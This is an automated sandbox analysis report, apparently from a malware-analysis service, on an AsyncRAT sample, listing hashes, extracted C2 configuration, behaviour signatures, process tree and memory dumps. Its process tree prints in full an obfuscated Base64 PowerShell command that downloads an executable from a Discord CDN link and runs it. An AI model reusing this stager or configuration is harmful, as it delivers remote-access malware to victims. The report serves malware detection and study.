Analysis

  • max time kernel
    143s
  • max time network
    192s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    05-12-2022 06:35

General

  • Target

    d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9.exe

  • Size

    6KB

  • MD5

    378deda0d1313deba917adfc74173962

  • SHA1

    cb466cdd64949febdaaae75625d5a3ce0fff6e35

  • SHA256

    d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9

  • SHA512

    c1411ed00aeb88b6f92702132d20dac2efacd90e79aee697e1e0431353638353a5f9fa6b575676e0426f1434cede0f59e58559822cc45067893a30f6b8300281

  • SSDEEP

    96:Ck79rll3VI2St01vk+Al5tONtUqvkC4muMs6d3oj0dirl:J9r/33SCvkRgNtUqvkBmm6dNdq

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

C2

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes
  • delay

    3

  • install

    false

  • install_file

    System Guard Runtime

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9.exe
    "C:\Users\Admin\AppData\Local\Temp\d34483a5c472119c4edbbf630522a41a9c43ba39bd58b040f5c1eb5e0d76e5a9.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADQAMgA0ADcANwA0ADEANwA2ADYAOAA4ADAAOAA3ADgANQAvADEAMAA0ADIANAA3ADcANQAwADYANAA4ADMAMQA5ADUAOQA2ADQALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAGwAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdABqAHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBlAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZABzAGYAZgBlADQAdgBiADUALgBlAHgAZQAnACkAKQA8ACMAZQB6AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgByAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAcQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGQAcwBmAGYAZQA0AHYAYgA1AC4AZQB4AGUAJwApADwAIwByAHMAawAjAD4A"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4812
      • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
        "C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4656
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:4856
    • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      1⤵
      • Executes dropped EXE
      PID:3272

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dsffe4vb5.exe.log
      Filesize

      902B

      MD5

      22ef0590c345545e384ba168af281f75

      SHA1

      77a5e71b08568a14c7305f479a073a27fd73bb9e

      SHA256

      ddc570d8f07709e4c8bbca0c8408d423f767aeabe413be9953fa999bcd66ea9f

      SHA512

      150d090f4d6278159a1d0eab0a4d67794c5eeed5484c6091cd055eac3a88d8e580655d5d5d3e46c62276e300d30625a1e7d1a9325ce1eb58cf2a1876777ac617

    • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      Filesize

      14.7MB

      MD5

      2cbd5d9d43c5c49f0580975e9e620808

      SHA1

      17e209b6d6c66882ed78a40d7e0d211760b489a0

      SHA256

      399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

      SHA512

      26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

    • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      Filesize

      14.7MB

      MD5

      2cbd5d9d43c5c49f0580975e9e620808

      SHA1

      17e209b6d6c66882ed78a40d7e0d211760b489a0

      SHA256

      399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

      SHA512

      26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

    • C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
      Filesize

      14.7MB

      MD5

      2cbd5d9d43c5c49f0580975e9e620808

      SHA1

      17e209b6d6c66882ed78a40d7e0d211760b489a0

      SHA256

      399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

      SHA512

      26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

    • memory/3880-115-0x0000000000730000-0x0000000000738000-memory.dmp
      Filesize

      32KB

    • memory/4656-181-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-195-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-147-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-148-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-149-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-150-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-151-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-153-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-154-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-155-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-156-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-157-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-158-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-159-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-160-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-182-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-162-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-163-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-164-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-165-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-166-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-167-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-168-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-169-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-170-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-171-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-172-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-173-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-174-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-175-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-176-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-177-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-178-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-179-0x0000000000340000-0x00000000011F0000-memory.dmp
      Filesize

      14.7MB

    • memory/4656-180-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-145-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-161-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-141-0x0000000000000000-mapping.dmp
    • memory/4656-146-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-185-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-186-0x0000000008000000-0x00000000081C6000-memory.dmp
      Filesize

      1.8MB

    • memory/4656-187-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-188-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-189-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-190-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-191-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-192-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-193-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-194-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-184-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-196-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-197-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-198-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-199-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-200-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-201-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-202-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-203-0x0000000005E80000-0x0000000005F1C000-memory.dmp
      Filesize

      624KB

    • memory/4656-204-0x0000000006420000-0x000000000691E000-memory.dmp
      Filesize

      5.0MB

    • memory/4656-205-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-206-0x00000000061A0000-0x0000000006232000-memory.dmp
      Filesize

      584KB

    • memory/4656-207-0x00000000062E0000-0x000000000637C000-memory.dmp
      Filesize

      624KB

    • memory/4656-211-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-143-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4656-183-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4812-125-0x00000182CD670000-0x00000182CD6E6000-memory.dmp
      Filesize

      472KB

    • memory/4812-122-0x00000182CD4C0000-0x00000182CD4E2000-memory.dmp
      Filesize

      136KB

    • memory/4812-116-0x0000000000000000-mapping.dmp
    • memory/4856-208-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

    • memory/4856-209-0x000000000040D0EE-mapping.dmp
    • memory/4856-212-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4856-210-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4856-214-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4856-213-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB

    • memory/4856-215-0x0000000077BF0000-0x0000000077D7E000-memory.dmp
      Filesize

      1.6MB